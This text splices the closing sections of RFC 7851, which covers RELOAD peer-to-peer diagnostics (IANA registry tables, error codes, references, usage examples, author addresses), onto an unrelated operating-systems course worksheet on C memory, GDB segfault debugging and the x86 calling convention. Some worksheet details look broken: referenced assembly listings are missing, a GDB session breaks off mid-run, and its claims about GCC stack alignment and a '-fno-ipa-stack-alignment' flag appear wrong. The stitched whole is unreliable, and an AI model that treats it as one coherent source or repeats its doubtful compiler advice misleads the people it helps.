<td>0x 0000 0000 0000 8000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>BATTERY_STATUS</td>
<td>0x 0000 0000 0001 0000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>Reserved Last Bit</td>
<td>0x 8000 0000 0000 0000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>Reserved All 1s value</td>
<td>0x ffff ffff ffff ffff</td>
<td>RFC 7851</td>
</tr>
</tbody>
</table>
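Requesting several diagnostics at once is a matter of ORing the flag values from the table above into dMFlags; a minimal sketch (the macro and function names are illustrative):

```c
#include <stdint.h>

/* Flag values copied from the registry table above. */
#define STATUS_INFO_FLAG       UINT64_C(0x0000000000000002)
#define SOFTWARE_VERSION_FLAG  UINT64_C(0x0000000000000040)
#define BATTERY_STATUS_FLAG    UINT64_C(0x0000000000010000)

/* A sender requests several kinds of diagnostic information by
 * setting the corresponding bits in the 64-bit dMFlags field. */
uint64_t build_dmflags(void) {
    return STATUS_INFO_FLAG | SOFTWARE_VERSION_FLAG | BATTERY_STATUS_FLAG;
}
```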
9.2. Diagnostic Kind ID
IANA has created a "RELOAD Diagnostic Kind ID" registry under protocol RELOAD. Entries in this registry are 16-bit integers denoting diagnostics extension data kinds carried in the diagnostic request and response messages, as described in Sections 5.1 and 5.2. Code points from 0x0001 to 0x003e are asked to be assigned together with flags within the "RELOAD Diagnostics Flag" registry. The registration procedure for the "RELOAD Diagnostic Kind ID" registry is Standards Action as defined in RFC 5226.
<table>
<thead>
<tr>
<th>Diagnostic Kind</th>
<th>Code</th>
<th>Specification</th>
</tr>
</thead>
<tbody>
<tr>
<td>Reserved</td>
<td>0x0000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>STATUS_INFO</td>
<td>0x0001</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>ROUTING_TABLE_SIZE</td>
<td>0x0002</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>PROCESS_POWER</td>
<td>0x0003</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>UPSTREAM_BANDWIDTH</td>
<td>0x0004</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>DOWNSTREAM_BANDWIDTH</td>
<td>0x0005</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>SOFTWARE_VERSION</td>
<td>0x0006</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>MACHINE_UPTIME</td>
<td>0x0007</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>APP_UPTIME</td>
<td>0x0008</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>MEMORY_FOOTPRINT</td>
<td>0x0009</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>DATASIZE_STORED</td>
<td>0x000a</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>INSTANCES_STORED</td>
<td>0x000b</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>MESSAGES_SENT_RCVD</td>
<td>0x000c</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>EWMA_BYTES_SENT</td>
<td>0x000d</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>EWMA_BYTES_RCVD</td>
<td>0x000e</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>UNDERLAY_HOP</td>
<td>0x000f</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>BATTERY_STATUS</td>
<td>0x0010</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>Unassigned</td>
<td>0x0011-0x003e</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>local use (Reserved)</td>
<td>0xf000-0xfffe</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>Reserved</td>
<td>0xffff</td>
<td>RFC 7851</td>
</tr>
</tbody>
</table>
Table 1: Diagnostic Kind
9.3. Message Codes
This document introduces two new types of messages and their responses, so the following additions have been made to the "RELOAD Message Codes" registry defined in RELOAD [RFC6940].
+-------------------+------------+----------+
| Message Code Name | Code Value | RFC |
+-------------------+------------+----------+
| path_track_req | 0x27 | RFC 7851 |
| path_track_ans | 0x28 | RFC 7851 |
+-------------------+------------+----------+
Table 2: Extensions to RELOAD Message Codes
9.4. Error Code
This document introduces the following new error codes, which have been added to the "RELOAD Error Codes" registry.
+----------------------------------------+------------+-----------+
| Error Code Name | Code Value | Reference |
+----------------------------------------+------------+-----------+
| Error_Underlay_Destination_Unreachable | 0x15 | RFC 7851 |
| Error_Underlay_Time_Exceeded | 0x16 | RFC 7851 |
| Error_Message_Expired | 0x17 | RFC 7851 |
| Error_Upstream_Misrouting | 0x18 | RFC 7851 |
| Error_Loop_Detected | 0x19 | RFC 7851 |
| Error_TTL_Hops_Exceeded | 0x1A | RFC 7851 |
+----------------------------------------+------------+-----------+
Table 3: RELOAD Error Codes
9.5. Message Extension
This document introduces the following new RELOAD extension code:
+-----------------+------+-----------+
| Extension Name | Code | Reference |
+-----------------+------+-----------+
| Diagnostic_Ping | 0x2 | RFC 7851 |
+-----------------+------+-----------+
Table 4: New RELOAD Extension Code
9.6. XML Name Space Registration
This document registers a URI for the config-diagnostics XML namespace in the IETF XML registry defined in [RFC3688]. All the elements defined in this document belong to this namespace.
URI: urn:ietf:params:xml:ns:p2p:config-diagnostics
Registrant Contact: The IESG.
XML: N/A; the requested URIs are XML namespaces
The overlay configuration file MUST contain the following XML element, declaring P2P diagnostics as a mandatory extension to RELOAD.
<mandatory-extension>
urn:ietf:params:xml:ns:p2p:config-diagnostics
</mandatory-extension>
10. References
10.1. Normative References

[RFC3688] Mealling, M., "The IETF XML Registry", BCP 81, RFC 3688, January 2004.

[RFC5226] Narten, T. and H. Alvestrand, "Guidelines for Writing an IANA Considerations Section in RFCs", BCP 26, RFC 5226, May 2008.

[RFC6940] Jennings, C., Lowekamp, B., Ed., Rescorla, E., Baset, S., and H. Schulzrinne, "REsource LOcation And Discovery (RELOAD) Base Protocol", RFC 6940, January 2014.

10.2. Informative References

[RFC5905] Mills, D., Martin, J., Ed., Burbank, J., and W. Kasch, "Network Time Protocol Version 4: Protocol and Algorithms Specification", RFC 5905, June 2010.
Appendix A. Examples
Below, we sketch how these metrics can be used.
A.1. Example 1
A peer may set EWMA_BYTES_SENT and EWMA_BYTES_RCVD flags in the PathTrackReq to its direct neighbors. A peer can use EWMA_BYTES_SENT and EWMA_BYTES_RCVD of another peer to infer whether it is acting as a media relay. It may then choose not to forward any requests for media relay to this peer. Similarly, among the various candidates for filling up a routing table, a peer may prefer a peer with a large UPTIME value, small RTT, and small LAST_CONTACT value.
A.2. Example 2
A peer may set the STATUS_INFO Flag in the PathTrackReq to a remote destination peer. The overlay has its own threshold definition for congestion. The peer can obtain knowledge of all the status information of the intermediate peers along the path, then it can choose other paths to that node for the subsequent requests.
A.3. Example 3
A peer may use Ping to evaluate the average overlay hops to other peers by sending PingReq to a set of random resource or node IDs in the overlay. A peer may adjust its timeout value according to the change of average overlay hops.
Appendix B. Problems with Generating Multiple Responses on Path
An earlier draft version of this document considered an approach where a response was generated by each intermediate peer as the message traversed the overlay. This approach was discarded. One reason this approach was discarded was that it could provide a DoS mechanism, whereby an attacker could send an arbitrary message claiming to be from a spoofed "sender" the real sender wished to attack. As a result of sending this one message, many messages would be generated and sent back to the spoofed "sender" -- one from each intermediate peer on the message path. While authentication mechanisms could reduce some risk of this attack, it still resulted in a fundamental break from the request-response nature of the RELOAD protocol, as multiple responses are generated to a single request. Although one request with responses from all the peers in the route will be more efficient, it was determined to be too great a security risk and a deviation from the RELOAD architecture.
Acknowledgments
We would like to thank Zheng Hewen for the contribution of the initial draft version of this document. We would also like to thank Bruce Lowekamp, Salman Baset, Henning Schulzrinne, Jiang Haifeng, and Marc Petit-Huguenin for the email discussion and their valued comments, and special thanks to Henry Sinnreich for contributing to the usage scenarios text. We would like to thank the authors of the RELOAD protocol for transferring text about diagnostics to this document.
Authors’ Addresses
Haibin Song
Huawei
Email: haibin.song@huawei.com
Jiang Xingfeng
Huawei
Email: jiangxingfeng@huawei.com
Roni Even
Huawei
14 David Hamelech
Tel Aviv 64953
Israel
Email: ron.even.tlv@gmail.com
David A. Bryan
ethernot.org
Cedar Park, Texas
United States
Email: dbryan@ethernot.org
Yi Sun
ICT
Email: sunyi@ict.ac.cn
1 C
C is often the programming language of choice in operating systems. C grants programmers low-level access to memory which is very useful. You’ll be reading and writing a lot of C code throughout this class.
Types
C is statically typed where types are known at compile time. However, C is also weakly typed meaning you can cast between any types. This gives the necessary flexibility for working with low-level memory, but it also opens up many avenues for errors if you’re not careful.
The primitive types include char, short, int, long, float, and double. The size of data types may vary depending on the operating system, so it’s best to check using the operator sizeof.
Arrays, denoted with [] (e.g. int[]), are contiguous regions of memory of fixed size. Each element is the size of the data type corresponding to that array. A string in C is just an array of characters with a last element as null to indicate the end of the string.
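The point about strings can be seen directly: `sizeof` counts the terminating null byte, while `strlen` does not.

```c
#include <string.h>

/* "hi" occupies three bytes of storage: 'h', 'i', and '\0'. */
char greeting[] = "hi";

size_t greeting_storage(void) { return sizeof(greeting); } /* array size */
size_t greeting_length(void)  { return strlen(greeting); } /* chars before '\0' */
```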
Users can define compound data types using structs which are contiguous pieces of memory comprised of multiple other data types.
Pointers are references that hold the address of an object in memory. Fundamentally, pointers are just unsigned integers of size equal to the number of bits supported by the operating system. Prefixing a pointer with * will return the value at the memory address that the pointer is holding. On the other hand, prefixing a variable with & will return the memory address of the variable.
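A small sketch of the two prefix operators: `&` yields a variable's address, and `*` reads or writes through that address.

```c
/* Writing through a pointer modifies the variable it points at. */
int write_through_pointer(void) {
    int x = 61;
    int *p = &x;   /* p holds the address of x */
    *p = 162;      /* write through p, changing x */
    return x;
}
```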
Memory
A typical C program’s memory is divided into five segments.
<table>
<thead>
<tr>
<th>Segment</th>
<th>Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td>Text</td>
<td>Machine code of the compiled program</td>
</tr>
<tr>
<td>Initialized Data</td>
<td>Initialized global and static memory</td>
</tr>
<tr>
<td>Uninitialized Data</td>
<td>Uninitialized global and static memory</td>
</tr>
<tr>
<td>Heap</td>
<td>Dynamically allocated memory</td>
</tr>
<tr>
<td>Stack</td>
<td>Local variables and argument passing</td>
</tr>
</tbody>
</table>
In general, memory can be thought of as a giant array with elements of one byte where a memory address indexes into this array.
Unlike stack memory, heap memory needs to be explicitly managed by the user. Memory can be allocated in the heap using malloc, calloc, or realloc. These all return a pointer to a chunk of memory in heap that is the size of the amount requested. When the memory is no longer being used, it needs to be explicitly released using free.
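A minimal sketch of manual heap management: allocate with `malloc`, hand the pointer back, and require the caller to `free` it (this is a hand-rolled stand-in for `strdup`, for illustration).

```c
#include <stdlib.h>
#include <string.h>

/* Returns a heap-allocated copy of s; the caller must free() it. */
char *heap_copy(const char *s) {
    char *p = malloc(strlen(s) + 1);      /* +1 for the null terminator */
    if (p != NULL)
        memcpy(p, s, strlen(s) + 1);      /* copy bytes including '\0' */
    return p;
}
```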
GNU Debugger (GDB)
GNU Debugger (GDB) is a powerful tool for debugging your programs. While you may have gotten by in CS 61C without using it, the complicated codebase for this class will require you to be proficient with GDB. Help will not be given to those who are not able to use GDB.
The general workflow of using GDB is as follows.
1. Compile the program using the -g flag.
2. Start GDB using gdb <executable>.
3. Set breakpoints using break <linenum>. You can also break at functions by using break <func>.
4. Run program with run. If the program takes in arguments, pass in those (i.e. run arg1 arg2).
5. Once you hit your breakpoint, examine using `print`. Other commands like `display`, `watch`, and `set` will also come in handy. You can also step line by line using `next`.
While you don’t have to memorize all the GDB commands, you’ll grow familiar with them the more you use them. When looking for certain functionality, check out the GDB User Manual¹.
### 1.1 Concept Check
1. Consider a valid double pointer `char** dbl_char` in a 32-bit system. What is `sizeof(*dbl_char)`?
4 bytes. `dbl_char` is a double pointer, so dereferencing it once still gives a pointer. A 32-bit system means memory addresses are 32 bits, or equivalently 4 bytes.
2. Consider strings initialized as
```c
char* a = "162 is the best";
char b[] = "162 is the best";
```
Are `a` and `b` different?
Yes. Since it’s defined as a literal, `a` points to a string literal in a read only section of memory. On the other hand, `b` resides on the stack. It is equivalent to declaring
```c
char b[] = {'1', '6', '2', ' ', 'i', 's', ' ', 't', 'h', 'e', ' ', 'b', 'e', 's', 't', '\0'};
```
3. Suppose you have an integer array `int nums[3] = {152, 161, 162}`. What are the differences between `nums`, `&nums`, and `&nums[0]`?
The three will all return memory address that are equivalent to each other. However, there is a subtle difference in that `nums` and `&nums[0]` point to the first element (i.e. an integer), while `&nums` points to the entire array (i.e. an array of integers). As a result, if you increment each of them by one, `nums` and `&nums[0]` will be incremented by `sizeof(int)`, while `&nums` will be incremented by `3 * sizeof(int)`.
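The byte distances described above can be checked directly by casting to `char *`:

```c
#include <stddef.h>

int nums[3] = {152, 161, 162};

/* nums + 1 advances by one element; &nums + 1 advances past the
 * whole array. Casting to char* exposes the distance in bytes. */
ptrdiff_t element_step(void) { return (char *)(nums + 1)  - (char *)nums; }
ptrdiff_t array_step(void)   { return (char *)(&nums + 1) - (char *)nums; }
```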
### 1.2 Headers
```c
#include <stdio.h>
#include "lib.h"
int main(int argc, char** argv) {
helper_args_t helper_args;
helper_args.string = argv[0];
helper_args.target = '/';
char* result = helper_func(&helper_args);
printf("%s\n", result);
return 0;
}
```
The first listing above is `app.c`; the second is the shared header `lib.h` together with `lib.c`. (The `#ifdef ABC` guard around `char* aux` is implied by the questions below.)

```c
/* lib.h */
typedef struct helper_args {
#ifdef ABC
    char* aux;
#endif
    char* string;
    char target;
} helper_args_t;

char* helper_func(helper_args_t* args);

/* lib.c */
#include <stdio.h>
#include "lib.h"

char* helper_func(helper_args_t* args) {
    int i;
    for (i = 0; args->string[i] != '\0'; i++)
        if (args->string[i] == args->target)
            return &args->string[i + 1];
    return args->string;
}
```
1. https://sourceware.org/gdb/current/onlinedocs/gdb/
You build the program on a 64-bit machine as follows.
> gcc -c app.c -o app.o
> gcc -c lib.c -o lib.o
> gcc app.o lib.o -o app
1. What is the size of a `helper_args_t` struct?
16 bytes. Since `ABC` is not defined, there is only `char* string` and `char target`, which is a total of $8 + 1 = 9$ bytes. However, GCC pads the structure for alignment, so it fills in the remaining 7 bytes after `char target`.
2. Suppose you add `#define ABC` at the top of `lib.h`. What is the size of a `helper_args_t` struct?
24 bytes. Now that `ABC` is defined, there’s an additional 8 bytes from `char* aux`.
3. Suppose we build the program in a different way with the original files (i.e. none of the changes from previous question apply).
> gcc -DABC -c app.c -o app.o
> gcc -c lib.c -o lib.o
> gcc app.o lib.o -o app
The program will now exhibit undefined behavior. What is the issue?
`app.c` is compiled with `ABC` defined (as seen from the `-DABC` flag), but `lib.c` is compiled without it. As a result, they have differing definitions of `helper_args_t`. In `main`, `argv[0]` is stored at the address of `helper_args` + 8 bytes, since `app.c` was compiled with the `char* aux` member, making the `char* string` member sit at an 8-byte offset from `args`. However, in `helper_func`, the program accesses the address of `args` itself when it reads `args->string`, since `lib.c` was compiled without the `char* aux` member, making `char* string` the first member. This leads to undefined behavior: `char* aux` was never initialized in `main`, so it contains a garbage value.
An important observation is that this won’t always lead to a segfault. The value in the `char* aux` member is garbage, meaning it could, by complete chance, happen to be a valid memory address.
### 1.3 Debugging Segmentation Faults
Observe the following program from `singer.c` which aims to sort a string using quicksort. The program will use a string provided as the argument or defaults to "IU is the best singer!" if none is provided.
When the program is compiled and run, we get the output on the right. Use GDB to fix the issue.
```c
#include <stdio.h>
#include <string.h>

void swap(char* a, int i, int j) {
    char t = a[i];
    a[i] = a[j];
    a[j] = t;
}

int partition(char* a, int l, int r) {
    int pivot = a[l];
    int i = l, j = r + 1;
    while (1) {
        do
            ++i;
        while (a[i] <= pivot && i <= r);
        do
            --j;
        while (a[j] > pivot);
        if (i >= j)
            break;
        swap(a, i, j);
    }
    swap(a, l, j);
    return j;
}

void sort(char* a, int l, int r) {
    if (l < r) {
        int j = partition(a, l, r);
        sort(a, l, j - 1);
        sort(a, j + 1, r);
    }
}

int main(int argc, char** argv) {
    char* a = NULL;
    if (argc > 1)
        a = argv[1];
    else
        a = "IU is the best singer!";
    printf("Unsorted: \"%s\"\n", a);
    sort(a, 0, strlen(a) - 1);
    printf("Sorted  : \"%s\"\n", a);
    return 0;
}
```

> ./singer "Taeyeon is the best singer!"
Unsorted: "Taeyeon is the best singer!"
Sorted  : "    !Tabeeeeeghiinnorssstty"

> ./singer
Unsorted: "IU is the best singer!"
Segmentation fault (core dumped)
1. We want to debug the program using GDB. How should we compile the program?
`gcc -g singer.c -o singer`. We need the `-g` flag for debugging information. The `-o` flag simply controls the name of the created executable, which defaults to `a.out` if not specified.
2. When running the program without any arguments (i.e. using the default argument), what line does the segfault happen? Describe the memory operations happening in that line.
First, we compile the program using the command from the previous problem.
> gcc -g singer.c -o singer
The first step in debugging a segfault is finding the line where it occurred. You can get to that line by letting the program run until it encounters the fault. For a more holistic view, you can also get a backtrace of the error using `backtrace`.
```bash
> gdb singer
(gdb) run
Starting program: /home/runner/intro/singer
Unsorted: "IU is the best singer!"

Program received signal SIGSEGV, Segmentation fault.
0x00005646308006c8 in swap (a=0x564630800904 "IU is the best singer!", i=1, j=21)
    at singer.c:6
6         a[i] = a[j];
(gdb) backtrace
#0  0x00005646308006c8 in swap (a=0x564630800904 "IU is the best singer!", i=1, j=21)
    at singer.c:6
#1  0x0000564630800773 in partition (a=0x564630800904 "IU is the best singer!", l=0, r=21)
    at singer.c:26
#2  0x00005646308007bd in sort (a=0x564630800904 "IU is the best singer!", l=0, r=21)
    at singer.c:36
#3  0x0000564630800861 in main (argc=1, argv=0x7ffd04ac7098) at singer.c:51
```
This tells us the segfault occurred on line 6 in the `swap` function, which is `a[i] = a[j]`. This line performs two memory operations: a read from `a[j]` and a write to `a[i]`.
When running on Replit, you may get the warning "warning: Error disabling address space randomization: Operation not permitted". Feel free to ignore this, as it is a limitation of Replit.
3. Run the program with and without an argument and observe the memory address of `a` in the segfaulting line. Why are the memory addresses so different?
Using GDB, break at line 6 where the segfault occurs.
```bash
> gdb singer
(gdb) break 6
Breakpoint 1 at 0x6ab: file singer.c, line 6.
(gdb) run
Starting program: /home/runner/intro/singer
Unsorted: "IU is the best singer!"
Breakpoint 1, swap (
    a=0x5624e4600904 "IU is the best singer!", i=1, j=21)
    at singer.c:6
6         a[i] = a[j];
(gdb) print a
$1 = 0x5624e4600904 "IU is the best singer!"
(gdb) run "Taeyeon is the best singer!"
The program being debugged has been started already.
```

The default string is a literal baked into the executable’s read-only data segment, so `a` holds a low address near the program code. When an argument is supplied, `a` points into `argv[1]`, which is placed on the stack near the top of the address space. The large gap between the two addresses reflects these two very different regions of memory.
4. How should the code be changed to fix the segfault?
The segfaulting line is in the `swap` function, which is called by `partition` in lines 26 and 29. However, notice that the read from `a[j]` is not a problem, as the same read is performed in line 21. This indicates that the write to `a[i]` is the issue.
This lines up with our observations from the previous question. Since the data is in a read-only segment, it makes sense that the program cannot write to it. As a result, we need to move the initial string to somewhere else on the address space (e.g. heap). To do this, we need to allocate the appropriate amount of space and then copy over the string. This could be accomplished with a `malloc` followed by a `strcpy`, or `strdup` which does the same thing.
Replacing line 48 with `a = strdup("IU is the best singer!")` will fix the segfault. You might say that we should free `a` since it will be allocated on the heap. However, this isn’t necessary, as the last line where `a` is used is line 52, which is also the last line of the program.
---
2 x86
x86 is a family of instruction set architectures (ISA) developed by Intel. Unlike RISC-V from CS 61C, x86 is based on the complex instruction set computer (CISC) architecture. x86 being a family of ISAs means there are a variety of different dialects of this language. In this class, we will focus on the 32-bit ISA called IA-32 or i386, which is the common denominator for all 32-bit x86 processors and hence used in Pintos (while heavily related, the ISA should not be confused with the 32-bit microprocessor i386, also known as the Intel 80386). However, we will still occasionally mention the 64-bit ISA x86-64, which you may come across in some non-Pintos assignments.
Registers
Registers are small storage spaces directly on the processor, allowing for fast memory access.
Recall from CS 61C that RISC-V had 32 general purpose registers (GPRs) x0 - x31 with appropriate ABI names (e.g. x2 = sp for stack pointer). Due to architectural differences, x86 only has 8 GPRs.
<table>
<thead>
<tr>
<th>Register</th>
<th>Name</th>
<th>Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td>ax</td>
<td>Accumulator</td>
<td>I/O port access, arithmetic, interrupt calls</td>
</tr>
<tr>
<td>bx</td>
<td>Base</td>
<td>Base pointer for memory access</td>
</tr>
<tr>
<td>cx</td>
<td>Counter</td>
<td>Loop counting, bit shifts</td>
</tr>
<tr>
<td>dx</td>
<td>Data</td>
<td>I/O port access, arithmetic, interrupt calls</td>
</tr>
<tr>
<td>sp</td>
<td>Stack Pointer</td>
<td>Top address of stack</td>
</tr>
<tr>
<td>bp</td>
<td>Base Pointer</td>
<td>Base address of stack</td>
</tr>
<tr>
<td>si</td>
<td>Source Index</td>
<td>Source for stream operations (e.g. string)</td>
</tr>
<tr>
<td>di</td>
<td>Destination Index</td>
<td>Destination for stream operations (e.g. string)</td>
</tr>
</tbody>
</table>
Due to x86’s 16-bit history, the GPRs started as 16-bits and were extended to 32-bits with the e prefix (e.g. eax for ax) and 64-bits with the r prefix (e.g. rax for ax). Each 16-bit GPR can be addressed by the 8-bit LSB (i.e. lower 8 bits) by replacing the last letter with l (e.g. al for ax). ax, cx, dx, and bx can also be addressed by the 8-bit MSB (i.e. higher 8 bits) by replacing the last letter with h (e.g. ah for ax).
Akin to the program counter register pc from RISC-V, x86 has an instruction pointer register ip. Like the GPRs, it is extended to 32-bits with the e prefix and 64-bits with r prefix. ip is a special register since it cannot be read and modified like a GPR (i.e. cannot use vanilla memory instructions).
There are other registers such as segment, EFLAGS, control, debug, test, floating point and many more. However, the GPRs and the instruction pointer register are the main ones you will work with in this class.
Syntax
Although IA-32 specifies the registers and instructions, there are two different syntaxes: Intel and AT&T. In this class, we will use the AT&T syntax because it is used by the GNU Assembler, the assembler for GCC and thus the standard for Pintos and most Unix-like operating systems like Linux. The two syntaxes have significant differences, so make sure to check which syntax is being used when referencing documentation.
Registers are preceded by a percent sign (e.g. `%eax` for eax). Immediates such as constants are preceded by a dollar sign (e.g. `$162` for the constant 162).
The general structure of a line of code is `inst src, dest`. For example, `movl %ebx, %eax` will move the contents of %ebx into %eax.
Addressing memory uses the syntax `offset(base, index, scale)` where base and index are registers, and offset and scale are integers (scale can only take on values of 1, 2, 4, or 8). This accesses the data at memory address base + index * scale + offset. All parameters are optional, though in most cases you will only see base and offset; scale defaults to 1 and offset to 0 when omitted. The following are some use cases of addressing memory with different instructions.
mov 8(%ebx), %eax | Move contents from the address ebx + 8 into eax
mov %ecx, -4(%esi, %ebx, 8) | Move contents in ecx into address esi + 8 * ebx - 4
One exception to the above syntax is the `lea` instruction, which stands for "load effective address". `lea` operates directly on the memory addresses themselves and not the contents contained in the memory addresses. For instance, `lea 8(%ebx), %eax` would put the address ebx + 8 into eax, not the contents at that address.
Each instruction also has a suffix that signifies the operand size: `b` means byte (8 bits), `w` means word (16 bits), and `l` means long (32 bits). These are used when the intended data size is ambiguous (e.g. `mov $0, (%esp)`).
<table>
<thead>
<tr>
<th>Instruction</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>movb $0, (%esp)</td>
<td>Zero out a single byte from the stack pointer</td>
</tr>
<tr>
<td>movw $0, (%esp)</td>
<td>Zero out two bytes from the stack pointer</td>
</tr>
<tr>
<td>movl $0, (%esp)</td>
<td>Zero out four bytes from the stack pointer</td>
</tr>
</tbody>
</table>
The suffixes aren’t always necessary when the intended data size can be inferred in some cases (e.g. using a 32-bit register as an operand means a 32-bit operation), but it is good practice to use them regardless.
A key difference of x86 from RISC-V is how much one instruction can accomplish due to its complex instruction set. For instance, `addl %ecx, 8(%ebx)` loads a value from memory, adds to it, and stores the result back in a single instruction, whereas RISC-V would need a separate load, add, and store.
### Calling Convention
**Calling convention** is a procedure for how to call and return from functions. It specifies stack management, how parameters are passed, which registers need to be saved, how values are returned, and more. There are two sets of rules: one for the caller of the function and one for the callee.
Calling conventions are heavily tied into the language that’s being compiled. In this class, we will use the calling convention defined by the i386 System V ABI as the default calling convention.
#### Caller
Before calling the function (i.e. prologue), the caller needs to
1. Save caller-saved GPRs (EAX, ECX, EDX) onto the stack *if needed after the function call*.
2. Push parameters onto the stack in reverse order (i.e. store first parameter at the lowest address). Add necessary padding *before the parameters* to ensure a 16-byte alignment.
Then the caller calls the function by pushing the return address onto the stack and jumping to the function. Once the function call returns (i.e. epilogue), the caller needs to
1. Remove the parameters from the stack.
2. Restore caller-saved GPRs (if any) from the prologue.
#### Callee
Before executing any function logic (i.e. prologue), the callee needs to
1. Push EBP onto the stack and set ebp to be the new esp (i.e. stack pointer after pushing the ebp). This marks the start of a new stack frame.
2. Allocate stack space for any local variables (i.e. decrement esp).
3. Save callee-saved GPRs (ebx, edi, esi) onto the stack if used during the function call.
Then the callee performs the function logic. Before returning (i.e. epilogue), the callee needs to
1. Store the return value in eax.
2. Restore callee-saved GPRs (if any) from the prologue.
3. Deallocate local variables. While adding the correct amount to esp will technically work, a less error-prone way is to set esp to the current ebp, effectively clearing the stack frame.
4. Restore caller’s ebp from the stack.
5. Return from the function by popping the return address pushed by the caller in its prologue and jumping to it.
**Instructions**
There are a few commonly used instructions that will show up in nearly every assembly code due to the calling convention.
<table>
<thead>
<tr>
<th>Instruction</th>
<th>Purpose</th>
<th>Effective</th>
</tr>
</thead>
<tbody>
<tr>
<td>pushl src</td>
<td>Push src onto stack</td>
<td>subl $4, %esp<br>movl src, (%esp)</td>
</tr>
<tr>
<td>popl dest</td>
<td>Pop from stack into dest</td>
<td>movl (%esp), dest<br>addl $4, %esp</td>
</tr>
<tr>
<td>call addr</td>
<td>Push return address onto stack and jump to addr</td>
<td>pushl %eip<br>jmp addr</td>
</tr>
<tr>
<td>leave</td>
<td>Restore EBP and ESP to previous stack frame</td>
<td>movl %ebp, %esp<br>popl %ebp</td>
</tr>
<tr>
<td>ret</td>
<td>Pop return address from stack and jump to it</td>
<td>popl %eip</td>
</tr>
</tbody>
</table>
Keep in mind the effective column shows what the instruction is doing, but it may not exactly be what the processor does. In fact, `call` and `ret` access EIP directly using `mov` which is not allowed.
**Optimizations**
When compiling with optimizations using GCC (e.g. the `-O3` flag), you may notice some violations of these calling conventions, most notably the saving of the base pointer. This is because the base pointer is not a necessity: the stack pointer is sufficient to address anything we need. Even in RISC-V, the equivalent frame pointer did not need to be saved as part of the calling convention.
Another notable omission is the 16-byte stack alignment which GCC omits by default even without any optimizations. As a result, you will need to specify the `-fno-ipa-stack-alignment` flag when compiling to get the necessary 16-byte alignment.
**2.1 Concept Check**
1. Between SP and BP, which has a higher memory address?
**bp** has a higher memory address. The stack grows downwards, meaning the top of the stack moves towards lower addresses.
2. Based on the differences between RISC and CISC, why might x86 have fewer GPRs compared to RISC-V?
The reduced instruction set of RISC-V means the processor requires less hardware space for transistors, leaving more room for GPRs.
3. Write three different ways to clear the `eax` register (i.e. store a 0).
`movl $0, %eax`, `xorl %eax, %eax`, and `subl %eax, %eax` all leave `eax` holding 0. The latter two are common because they encode more compactly than the `mov` with an immediate.
4. True or False: Right before the caller jumps to the desired function, the stack must be 16-byte aligned.
False. The stack needs to be 16-byte aligned right after the parameters have been pushed onto the stack. Return address is pushed right before jumping.
2.2 Reverse Engineering
A Pythagorean triplet $a < b < c$ satisfies the property $a^2 + b^2 = c^2$. \texttt{triplet.s} on the right returns the product of a Pythagorean triplet for which $a + b + c = 1000$. \texttt{triplet.s} has been assembled without optimizations based on a complete version of \texttt{triplet.c} given on the left. Unused labels and directives have been omitted in \texttt{triplet.s} for simplicity.
1. What is the memory address of \( a \) relative to the base pointer?
\texttt{triplet.c} shows that \( a \) is defined to be a value of 1. In line 5 of \texttt{triplet.s}, we see a local variable being defined on the stack with the constant 1. Since \( a \) is the first variable that needs to be defined in the code, line 5 must correspond to \( a \), meaning \( a \) is defined at \( \text{EBP} - 4 \) (i.e. four bytes below the base pointer).
2. What is the end condition for the outer loop using \( a \)?
After \( a \) is defined on line 7, we jump to .L2 in line 8. This brings us to line 43, where we compare \( a \) (i.e. \( -4(\%ebp) \)) with 333 using the \texttt{cmp} instruction. In line 44, we jump to .L7 (the loop body) if \( a \) is less than or equal to 333. Otherwise, we fall through to the rest of the code, which loads 0 into \texttt{eax} and performs the return procedure in .L5. Therefore, the outer loop continues as long as \( a \) is less than or equal to 333.
3. What are the memory addresses of the rest of the local variables \((a2, b, b2, c, c2)\) relative to the base pointer?
Since the code is unoptimized, we trace the code with the appropriate jumps to see where each local variable is defined.
After \( a \) is defined, we jump to .L7, where we see in line 12 that \( a2 \) is the next variable defined, at \( \text{EBP} - 12 \). Afterwards, \( b \) is defined at \( \text{EBP} - 8 \) in line 14. This is confirmed by the similar loop structure, as the code jumps to .L3 where \texttt{cmp} and \texttt{jle} exist, as seen for \( a \).
The code then jumps to .L6 where \( b2, c, \) and \( c2 \) are defined at 16, 20, and 24 bytes below the base pointer in lines 19, 23, and 26, respectively.
The stack viewed from the current base pointer looks like
\[
\begin{array}{c|c}
\text{ebp} & \\
a & \text{ebp} - 4 \\
b & \text{ebp} - 8 \\
a2 & \text{ebp} - 12 \\
b2 & \text{ebp} - 16 \\
c & \text{ebp} - 20 \\
c2 & \text{ebp} - 24 \\
\end{array}
\]
An important observation is how local variables are not always placed on the stack in the order they are defined in, so it’s important to not make such an assumption and instead trace the code. This is due to GCC’s stack slot assignment optimizations\(^*\) (not in scope).
4. Fill in the missing code for \texttt{triplet.c}.
```c
int main(void) {
for (int a = 1; a <= 333; a++) {
int a2 = a * a;
for (int b = a; b <= 666; b++) {
int b2 = b * b;
int c = 1000 - a - b;
int c2 = c * c;
if (a2 + b2 == c2) {
return a * b * c;
}
}
}
return 0;
}
```
triplet.c
